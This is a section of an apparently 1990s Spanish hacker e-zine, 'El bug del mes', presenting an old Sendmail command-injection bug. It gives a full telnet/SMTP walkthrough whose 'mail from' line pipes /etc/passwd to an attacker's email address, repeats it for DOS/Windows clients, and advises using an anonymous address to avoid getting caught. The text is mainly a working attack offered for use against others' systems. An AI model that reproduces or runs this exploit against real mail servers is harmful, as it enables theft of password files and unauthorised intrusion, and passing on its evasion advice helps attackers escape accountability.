IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
o 03. EL BUG DEL MES                                                        o
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


Hola soy el Red Cracker y me han encargado que escriba esta nueva seccion de
la revista. (Solo en este numero) La verdad es que mi especialidad no es el 
hacking por eso el bug del que voy a hablar no es muy espectacular. Ademas es 
un poco antiguo con lo que seguramente no funcionara en la mayoria de las 
maquinas.

Lo que hace este bug, es permitir que enviando un comando en la linea
del sendmail puedas conseguir que el fichero de passwords sea enviado
a tu direccion de correo. (Por eso es conveniente usar una direccion
anonima para no ser pillado)

------------------------------------------------------------------------------

Sistemas: Unix's en general, espacialmente AIX y SUNOS 
Versiones: Sendmail, versiones anteriores a la 5.57
Descripcion: Bug del sendmail
Ejemplo: en unix o linux

 saqland % telnet victima.com 25 
 Trying 128.128.128.1...
 Connected to victima.com  
 Escape character is '^]'.
 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
 rcpt to: loquequieras
 550 loquequieras... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 saqland %


Ejemplo: Conexion desde DOS o Windows y otros

 Con un programa de telnet conecta a este url -> victima.com:25
 o si se puede configurar en los menus configuralo para que la
 conexion se haga al puerto 25, que es el del sendmail.
 
 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"
 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok
 rcpt to: loquequieras
 550 loquequieras... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit


Notas:
-victima.com = nombre del ordenador a hackear
-saqland = nombre de nuestro ordenador
-Lo que aparece con un numero delante son mensajes de nuestra victima, 
el resto es lo que tienes que escribir.
-Aprende a usar bien el programa de telnet, porque es el que mas usaras a la
hora de hackear.

------------------------------------------------------------------------------

                                                                        Red